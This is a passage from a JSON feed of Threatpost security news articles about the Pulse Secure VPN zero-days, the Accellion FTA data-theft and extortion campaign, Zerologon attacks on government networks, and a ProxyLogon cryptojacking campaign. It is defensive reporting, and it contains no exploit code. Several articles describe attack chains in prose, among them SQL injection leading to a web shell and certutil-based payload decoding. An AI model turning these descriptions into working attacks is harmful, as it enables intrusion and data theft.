"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-04T17:56:13", "description": "Pulse Secure has [rushed a fix](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) for a critical zero-day security vulnerability in its Connect Secure VPN devices, which has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe.\n\nPulse Secure also patched three other security bugs, two of them also critical RCE vulnerabilities.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe zero-day flaw, tracked as CVE-2021-22893, was first disclosed on April 20 and carries the highest possible CVSS severity score, 10 out of 10. An exploit allows remote code-execution (RCE) and two-factor authentication bypass. The bug [is being used in the wild](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) to gain administrator-level access to the appliances, according to research from Pulse Secure\u2019s parent company, Ivanti.\n\nIt\u2019s related to multiple use-after-free problems in Pulse Connect Secure before version 9.1R11.4, according to the advisory issued Tuesday, and \u201callows a remote unauthenticated attacker to execute arbitrary code via license server web services.\u201d It can be exploited without any user interaction.\n\nThe activity level has been such that the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://cyber.dhs.gov/ed/21-03/>) warning businesses of the ongoing campaigns. These are [being tracked by FireEye Mandiant](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) as being carried out by two main advanced persistent threat (APT) clusters with links to China: UNC2630 and UNC2717.\n\nIn addition to the exploit for CVE-2021-22893, the campaigns involve 12 different malware families overall, Mandiant said. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement.\n\n\u201cNation-state hackers will forever pose a threat to businesses around the world,\u201d Andrey Yesyev, director of cybersecurity at Accedian, said via email. \u201cThese types of attacks are almost impossible to detect and are increasingly dangerous for any organization\u2019s sensitive data. Once hackers gain initial access to a victim\u2019s network, they\u2019ll move laterally in order to find valuable data. Furthermore, if they\u2019re able to infiltrate an organization\u2019s perimeter, bad actors could establish a connection to a command-and-control server (C2) \u2013 allowing them to control compromised systems and steal data from target networks.\u201d\n\n## **Additional Critical Pulse Connect VPN RCE Bugs**\n\nPulse Secure also rolled out fixes for three other concerning issues. Threatpost has reached out to Pulse Secure to find out whether these bugs are also being actively exploited in the wild.\n\nThe other patches are:\n\n * **CVE-2021-22894 (CVSS rating of 9.9)**: A buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows remote authenticated users to execute arbitrary code as the root user via maliciously crafted meeting room.\n * **CVE-2021-22899 (CVSS rating of 9.9):** A command-injection bug in Pulse Connect Secure before 9.1R11.4 allows remote authenticated users to perform RCE via Windows File Resource Profiles.\n * **CVE-2021-22900 (CVSS rating of 7.2):** Multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.\n\n## **Pulse Secure: A Cyberattacker\u2019s Favorite**\n\nPulse Secure appliances have been in the sights of APTs for months, with ongoing nation-state attacks using the bug tracked as CVE-2019-11510. It allows unauthenticated remote attackers to send a specially crafted URI to carry out arbitrary file-reading \u2013 perfect for espionage efforts.\n\nHere\u2019s a rundown of recent activity:\n\n * **April:** [The FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n * **April**: The Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n * **October**: CISA said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\nTo stay safe, Accedian\u2019s Yesyev suggested monitoring east-west traffic to detect these types of intrusions.\n\n\u201cAnd in order to detect C2 communications, it\u2019s important to have visibility into network communication patterns,\u201d he added. \u201cThis is yet another instance that proves the benefits of a layered security model. In addition to adopting network-based threat detection and user/endpoint behavior analytics solutions, security must be designed into the DevOps cycle. These technologies and processes help organizations understand communication patterns and destinations to help identify C2 tunnels\u2026allowing teams to identify stealthy lateral movements and ultimately protect data from being stolen.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-04T17:42:30", "type": "threatpost", "title": "Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2021-05-04T17:42:30", "id": "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "href": "https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T14:28:35", "description": "Energy giant Royal Dutch Shell is the latest victim of a series of attacks on users of the Accellion legacy File Transfer Appliance (FTA) product, which already has affected numerous companies and been [attributed](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>) to the FIN11 and the Clop ransomware gang.\n\n\u201cShell has been impacted by a data-security incident involving Accellion\u2019s File Transfer Appliance,\u201d the company revealed [on its website](<https://www.shell.com/energy-and-innovation/digitalisation/news-room/third-party-cyber-security-incident-impacts-shell.html>) last week. \u201cShell uses this appliance to securely transfer large data files.\u201d\n\nAttackers \u201cgained access to \u201cvarious files\u201d containing personal and company data from both Shell and some of its stakeholders, acknowledged the company. However, because its Accellion implementation its core IT systems were unaffected by the breach, \u201cas the file transfer service is isolated from the rest of Shell\u2019s digital infrastructure,\u201d the company said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nShell, the fifth largest company in the world, also revealed several of its global petrochemical and energy company affiliates were impacted.\n\nAccording to the company, once it learned of the incident, Shell immediately addressed the vulnerabilities with its service provider and cybersecurity team, and started an investigation to better understand the nature and extent of the incident.\n\n\u201cShell is in contact with the impacted individuals and stakeholders and we are working with them to address possible risks,\u201d the company said in a statement. \u201cWe have also been in contact with relevant regulators and authorities and will continue to do so as the investigation continues.\u201d\n\nShell did not say specifically how attackers accessed its Accellion implementation, but the breach is likely related to a series of attacks on vulnerabilities in Accellion FTA, a 20-year-old legacy product used by large corporations around the world. Accellion revealed that it became aware of a then zero-day security vulnerability in the product in mid-December, and subsequently scrambled to patch it.\n\nHowever, the first flaw turned out to be just one of a cascade of now patched zero-day bugs in the platform that Accellion discovered only after they came under attack from cyber-adversaries well into the new year, the company acknowledged. Other victims of third-party attacks on Accellion FTA include [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>) and [telecom giant Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>).\n\nEventually, four security vulnerabilities ([CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)) were found to be exploited in the attacks, according to the investigation. Accellion tried to patch each subsequent vulnerability as soon as it was discovered; however, as evidenced by Shell\u2019s disclosure, unpatched systems likely remain and further attacks seem likely.\n\nIndeed, patching is a complicated endeavor even for the most well-run IT organizations and many companies struggle to achieve complete coverage across their environments, observed Chris Clements, vice president of solutions architecture for cybersecurity firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost.\n\n\u201cThis is especially true for non-Microsoft Windows based systems, the unfortunate reality is that for many organizations, their patching strategy starts and stops with Windows,\u201d he said. \u201cInfrastructure equipment and especially network appliances like Accellion often lag significantly in patch adoption.\u201d\n\nThere are a number of reasons for why patches aren\u2019t immediately applied when they\u2019re made available, including lack of communication from vendors when patches are released, complex and manual patching processes, and organizational confusion around who\u2019s responsible for patch application, Clements added.\n\nThe Accellion attacks also once again shed light on the importance of choosing technology partners carefully when relying on them for critical digital processes that are exposed to potential exploit, said another security expert.\n\n\u201cThe Shell data breach illustrates the criticality of securing vendors and ensuring their systems don\u2019t compromise your own business,\u201d Demi Ben-Ari, CTO and co-founder of security firm [Panorays](<https://www.panorays.com/>) said in an email to Threatpost. \u201cVulnerabilities in vendors\u2019 legacy software can serve as an easy gateway to breach data in target companies \u2014 or worse.\u201d\n\n**_[Register for this LIVE Event](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)_****_: 0-Day Disclosures: Good, Bad & Ugly:_** **_On Mar. 24 at 2 p.m. ET_**_, Threatpost_ tackles how vulnerability disclosures can pose a risk to companies. To be discussed, Microsoft 0-days found in Exchange Servers. Join 0-day hunters from Intel Corp. and veteran bug bounty researchers who will untangle the 0-day economy and unpack what\u2019s on the line for all businesses when it comes to the disclosure process. [Register NOW](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>) for this **LIVE **webinar on Wed., Mar. 24.\n", "cvss3": {}, "published": "2021-03-23T14:16:14", "type": "threatpost", "title": "Energy Giant Shell Is Latest Victim of Accellion Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-03-23T14:16:14", "id": "THREATPOST:153B5C59C5DB1F87B3DFE2D673FA0030", "href": "https://threatpost.com/shell-victim-of-accellion-attacks/164973/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-22T18:12:09", "description": "Researchers have identified a set of threat actors (dubbed UNC2546 and UNC2582) with connections to the FIN11 and the Clop ransomware gang as the cybercriminal group behind the global zero-day attacks on users of the Accellion legacy File Transfer Appliance product.\n\n[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nMultiple Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), have all been attacked by the group, receiving extortion emails threatening to publish stolen data on the \u201cCL0P^_- LEAKS\u201d .onion website, according to an investigation from Accellion and FireEye Mandiant. Around 100 companies have been victims of the attack, analysts found, with around 25 suffering \u201csignificant data theft.\u201d No ransomware was used in the attacks.\n\n\u201cNotably, the number of victims on the \u201cCL0P^_- LEAKS\u201d shaming website has increased in February 2021 with organizations in the United States, Singapore, Canada and the Netherlands recently outed by these threat actors,\u201d according to the Mandiant findings, [issued on Monday](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploitedfor-data-theft-and-extortion.html>).\n\n## **4 Accellion FTA Zero-Days **\n\nAs noted, the point of entry for the attacks was Accellion FTA, a 20-year-old legacy product used by large corporations around the world. Accellion said that it became aware of a zero-day security vulnerability in FTA in mid-December, which it scrambled to patch quickly. But that turned out to be just one of a cascade of zero-days in the platform that the company discovered only after they came under attack from cyber-adversaries.\n\n\u201cThis initial incident was the beginning of a concerted cyberattack on the Accellion FTA product that continued into January 2021,\u201d the company explained. \u201cAccellion identified additional exploits in the ensuing weeks, and rapidly developed and released patches to close each vulnerability.\u201d\n\nFour zero-day security holes were exploited in the attacks, according to the investigation:\n\n * CVE-2021-27101 \u2013 SQL injection via a crafted Host header\n * CVE-2021-27102 \u2013 OS command execution via a local web service call\n * CVE-2021-27103 \u2013 SSRF via a crafted POST request\n * CVE-2021-27104 \u2013 OS command execution via a crafted POST request\n\nAnd, the published victim data appears to have been stolen using a distinct \u201cDEWMODE\u201d web shell, according to Mandiant, which added, \u201cThe exfiltration activity has affected entities in a wide range of sectors and countries.\u201d\n\n## **DEWMODE Web Shell for Stealing Information**\n\nMandiant found that a specific web shell, which it calls DEWMODE, was used to exfiltrate data from Accellion FTA devices. The adversaries first exploited one of the zero-days, then used that access to install DEWMODE.\n\n\u201cAcross these incidents, Mandiant observed common infrastructure usage and TTPs [tactics, techniques and procedures], including exploitation of FTA devices to deploy the DEWMODE web shell,\u201d Mandiant determined. \u201cA common threat actor we now track as UNC2546 was responsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being analyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546\u2019s activities.\u201d\n\nThe firm is still analyzing the zero-day exploitation, but it did say that in the early attacks in December, UNC2546 leveraged an SQL injection vulnerability in the Accellion FTA as its primary intrusion vector. SQL injection was then followed by subsequent requests to additional resources.\n\n\u201cUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a request to the file sftp_account_edit.php,\u201d according to the analysis. \u201cImmediately after this request, the built-in Accellion utility admin.pl was executed, resulting in an eval web shell being written to oauth.api. Almost immediately following this sequence, the DEWMODE web shell is written to the system.\u201d\n\nDEWMODE, once embedded, extracts a list of available files from a MySQL database on the FTA and lists those files and corresponding metadata\u2014file ID, path, filename, uploader and recipient\u2014on an HTML page. UNC2546 then uses the presented list to download files through the DEWMODE web shell.\n\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz \u2013 an archive that likely contained a dump of a database.\n\n## **Extortion via Clop Leaks Site**\n\nOnce DEWMODE was installed, victims began to receive extortion emails from an actor claiming association with the Clop ransomware team gang.\n\nThese are tailored to each victim and sent from a free email account, to a small number of addresses at the victim organization. If the victim did not respond in a timely manner, more emails are sent, this time to hundreds or thousands of different email accounts, using varied SMTP infrastructure.\n\n\n\nThe initial extortion note sent to victims of the Accellion FTA attacks. Source: FireEye Mandiant.\n\n\u201cIn at least one case, UNC2582 also sent emails to partners of the victim organization that included links to the stolen data and negotiation chat,\u201d according to Mandiant.\n\nThe firm also found through monitoring the CL0P^_- LEAKS shaming website that UNC2582 has followed through on threats to publish stolen data.\n\n\u201cSeveral new victims have appeared on the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA device had been recently targeted,\u201d according to Mandiant.\n\n## **FIN11, Clop and UNC2546**\n\nFIN11 is a financially motivated group that has been around for at least four years, conducting widespread phishing campaigns. However, it continues to evolve. It added the use of Clop ([which emerged](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/>) in February 2019) [and double extortion in October](<https://threatpost.com/fin11-gang-double-extortion-ransomware/160089/>); and added point-of-sale (POS) malware to its arsenal in 2018. In 2019, it started conducting run-of-the-mill ransomware attacks.\n\nMandiant has previously found that FIN11 threatened to post stolen victim data on the same .onion site used in the Accellion FTA attacks, usually in a double-extortion demand following the deployment of Clop ransomware. However, researchers found that the cybercriminals involved in these latest attacks are likely distinct from FIN11 itself despite sharing some overlaps.\n\n\u201cWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies running the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582,\u201d according to Mandiant. \u201cWe have identified overlaps between UNC2582, UNC2546 and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity.\u201d\n\nSome of the overlaps between UNC2582\u2019s data-theft extortion activity and prior FIN11 operations include common email senders.\n\n\u201cSome UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last campaigns that were clearly attributable to the group,\u201d according to the analysis.\n\nFIN11 has also used same the CL0P^_- LEAKS shaming site and is known for deploying Clop ransomware.\n\n\u201cThe UNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation page,\u201d according to Mandiant. \u201cThe linked websites were the same ones used to support historical Clop operations, a series of ransomware and data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\u201d\n\nWhen it comes to the zero-day cluster of activity, attributed to UNC2546, there are also limited overlaps with FIN11. Specifically, many of the organizations compromised by UNC2546 were previously targeted by FIN11.\n\nAnd, \u201can IP address that communicated with a DEWMODE web shell was in the \u2018Fortunix Networks L.P.\u2019 netblock, a network frequently used by FIN11 to host download and [FRIENDSPEAK command-and-control (C2) domains](<https://threatpost.com/us-finance-sector-targeted-backdoor-campaign/152634/>).\u201d\n\nThere\u2019s also a connection between UNC2546 and UNC2582, the firm found: In at least one case, the UNC2546 attackers interacted with DEWMODE from a host that was used to send UNC2582-attributed extortion email.\n\n\u201cThe overlaps between FIN11, UNC2546 and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships,\u201d Mandiant concluded. \u201cOne of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and foothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks.\u201d\n\nAlso, using SQL injection to deploy DEWMODE would represent a significant shift in FIN11 TTPs, \u201cgiven the group has traditionally relied on phishing campaigns as its initial infection vector and we have not previously observed them use zero-day vulnerabilities,\u201d Mandiant added.\n\n### _Is your small- to medium-sized business an easy mark for attackers? _\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n\n** **\n", "cvss3": {}, "published": "2021-02-22T17:51:20", "type": "threatpost", "title": "Accellion FTA Zero-Day Attacks Tied to Clop, FIN11", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-22T17:51:20", "id": "THREATPOST:3661EA0D8FCA17978A471DB91405999A", "href": "https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain 